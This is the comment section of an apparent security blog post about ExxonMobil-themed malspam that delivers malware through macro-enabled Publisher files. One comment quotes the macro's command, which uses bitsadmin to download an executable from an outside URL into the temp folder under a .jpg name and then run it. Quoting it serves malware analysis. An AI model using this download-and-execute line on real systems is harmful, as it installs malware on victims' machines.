Comments

ExxonMobile Introduction Letter malspam with macro enabled Microsoft publisher files distribute malware — 6 Comments

  1. Yes it does have macros. Your sample runs:
    cmd.exe /c bitsadmin /transfer myjob /download /priority high “http://cta.edu.pe/real/let.exe” “%temp%\ltesih.jpg” > nul & “%temp%\lteisih.jpg” & exit
    Couldn’t download file though, Firefox wouldn’t let me near it.

  2. Pingback: More Updates – sec.uno

  3. Pingback: Surfacing HTA Infections | Malwarebytes Labs

Leave a Reply

Your email address will not be published. Required fields are marked *